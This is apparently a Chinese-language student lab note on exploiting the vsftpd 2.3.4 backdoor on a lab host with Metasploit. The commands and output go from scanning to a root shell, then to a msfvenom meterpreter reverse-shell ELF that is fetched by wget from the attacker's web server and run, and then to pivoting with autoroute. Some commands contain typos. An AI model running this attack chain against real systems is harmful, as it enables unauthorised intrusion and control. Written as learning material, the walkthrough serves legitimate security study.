前言
针对VSFTPD2.3.4漏洞进行渗透测试提权
一、Metasploit中使用数据库
开启步骤
root@kali:~# service postgresql start
root@kali:~# msfdb init
msfdb ini 初始化数据库
- 使用msfconsole启动metasploit
- 输入db_status检查数据库连接状态,下图为连接成功
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 > Interrupt: use the 'exit' command to quit
msf6 >
二、利用msf中nmap扫描
msf6 > db_nmap -sV -u 192.168.1.105
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-06 15:22 CST
[*] Nmap: Nmap scan report for 192.168.1.105
[*] Nmap: Host is up (0.00035s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
...
- 使用services命令列出目标端口上运行的服务
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.1 1900 tcp upnp open
192.168.1.101 548 tcp afp filtered
192.168.1.102 8080 tcp tcpwrapped open
192.168.1.104 7000 tcp afs3-fileserver filtered
192.168.1.105 21 tcp ftp open vsftpd 2.3.4
192.168.1.105 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.105 23 tcp telnet open Linux telnetd
192.168.1.105 25 tcp smtp open Postfix smtpd
192.168.1.105 53 tcp domain open ISC BIND 9.4.2
192.168.1.105 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.1.105 111 tcp rpcbind open 2 RPC #100000
...
- 发现vsftpd 2.3.4 服务
- 利用该服务存在的漏洞进行分析
- 在msf中寻找该服务对应的渗透模块,search vsftpd2.3.4
msf6 > search vsftpd2.3.4
[-] No results from search
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
三、VSFTPD2.3.4渗透攻击
1.威胁建模
利用use选择该渗透模块,在用options列出参数
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use 0
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path
>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
2.攻击
利用set设置好参数进行攻击
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
利用show payloads 显示可用的攻击模块
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload 0
payload => cmd/unix/interact
exploit进行攻击
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 15:46:56 +0800
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
- 成功获得目标系统的root权限,但是只获得了一个shell,现在我们通过这个shell进行提权,提升到更强大的meterpreter
- 利用background切换线程
background
Background session 1? [y/N] y
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
3.提权
重新打开一个命令行,利用msfvenom命令创建一个攻击载荷
──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lprot=4444 -f elf >door.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
打开apache2服务,并将文件移动到www文件夹下面
──(root💀kali)-[~]
└─# service apache2 start
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/
┌──(root💀kali)-[~]
└─# cd ../var/www/html/
┌──(root💀kali)-[/var/www/html]
└─# ls
backdoor.elf door.elf index.html index.nginx-debian.html
┌──(root💀kali)-[/var/www/html]
└─#
切换到另一个窗口,使用sessions 1切换进程,利用wget下载这个文件
wget http://192.168.1.113/door.elf
--04:00:39-- http://192.168.1.113/door.elf
=> `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
0K 100% 52.85 MB/s
04:00:39 (52.85 MB/s) - `door.elf' saved [207/207]
下载成功,使用chmod提供权限
chmod 777 door.elf
- 为了能和被渗透计算机之间的通信,还需要在我们的系统上启动一个handler,这个handler的ip、port要和door.elf设置的相同
- 设置payload
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
sf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
设置参数
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
exploit进行攻击
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
切换到另一个命令行,使用./ 运行后门文件
./door.elf
等待handler响应,出现么meterpreter提示符,表示提权成功
metrtpreter>
但是试了很多次,重启了很多次,都无法连接到,只是出现了这个结果
#被控端
./door.elf
sh: line 36: 5588 Illegal instruction ./door.elf
#主控端
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
[*] Sending stage (3012548 bytes) to 192.168.1.105
经过测试,发现问题应该是设置参数的时候使用setg,端口也可能冲突了,以下是解决方法
生成攻击载荷
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.1.113 lprotE=4567 -f elf >door.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 1106216 bytes
Final size of elf file: 1106216 bytes
┌──(root💀kali)-[~]
└─# mv door.elf ../var/www/html/
利用vsftp2.3.4漏洞进入被控端shell,使用wget下载door.elf并运行
setg rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.1.105:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.105:21 - USER: 331 Please specify the password.
[+] 192.168.1.105:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.105:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.105:6200) at 2021-05-06 20:48:18 +0800
wget http://192.168.1.113/door.elf
--08:48:51-- http://192.168.1.113/door.elf
=> `door.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,106,216 (1.1M)
0K .......... .......... .......... .......... .......... 4% 94.96 MB/s
50K .......... .......... .......... .......... .......... 9% 56.06 MB/s
100K .......... .......... .......... .......... .......... 13% 23.98 MB/s
150K .......... .......... .......... .......... .......... 18% 57.84 MB/s
200K .......... .......... .......... .......... .......... 23% 89.08 MB/s
250K .......... .......... .......... .......... .......... 27% 61.57 MB/s
300K .......... .......... .......... .......... .......... 32% 110.44 MB/s
350K .......... .......... .......... .......... .......... 37% 99.21 MB/s
400K .......... .......... .......... .......... .......... 41% 384.56 MB/s
450K .......... .......... .......... .......... .......... 46% 58.07 MB/s
500K .......... .......... .......... .......... .......... 50% 331.37 MB/s
550K .......... .......... .......... .......... .......... 55% 310.93 MB/s
600K .......... .......... .......... .......... .......... 60% 70.01 MB/s
650K .......... .......... .......... .......... .......... 64% 420.48 MB/s
700K .......... .......... .......... .......... .......... 69% 260.77 MB/s
750K .......... .......... .......... .......... .......... 74% 79.61 MB/s
800K .......... .......... .......... .......... .......... 78% 479.97 MB/s
850K .......... .......... .......... .......... .......... 83% 464.31 MB/s
900K .......... .......... .......... .......... .......... 87% 54.07 MB/s
950K .......... .......... .......... .......... .......... 92% 382.36 MB/s
1000K .......... .......... .......... .......... .......... 97% 60.63 MB/s
1050K .......... .......... .......... 100% 221.59 MB/s
08:48:51 (90.92 MB/s) - `door.elf' saved [1106216/1106216]
chmod 777 door.elf
./door.elf
主控端设置攻击载荷并run
msf6 exploit(multi/handler) > set payload payload/linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > setg lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > setg lport 4567
lport => 4567
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.105:47496) at 2021-05-06 20:49:46 +0800
meterpreter >
成功获取meterpreter权限,玩点小花样
meterpreter > sysinfo
Computer : metasploitable.localdomain
OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
4.搭建跳板扫描内部网络
获取meterpreter权限后,使用autoroute设置跳板
meterpreter > run autoroute -p
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.0 255.255.255.0
[*] Adding a route to 192.168.1.0/255.255.255.0...
[+] Added route to 192.168.1.0/255.255.255.0 via 192.168.1.105
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 1
meterpreter >
利用background将后话切换到后台
meterpreter > background
[*] Backgrounding session 1...
利用auxiliary模块扫描内部网络
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in millisecon
ds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:
<path>'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) > setg rhosts 192.168.1.105
rhosts => 192.168.1.105
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.1.105: - 192.168.1.105:23 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:22 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:21 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:25 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:53 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:80 - TCP OPEN
[+] 192.168.1.105: - 192.168.1.105:111 - TCP OPEN
可以通过搭建跳板的形式对内部网络进行扫描渗透,从而发现更多主机的漏洞
总结
本文简单介绍了vsftp2.3.4后门漏洞的渗透攻击以及提权,本人也在学习当中,仅供参考,作为学习笔记使用,欢迎一起讨论。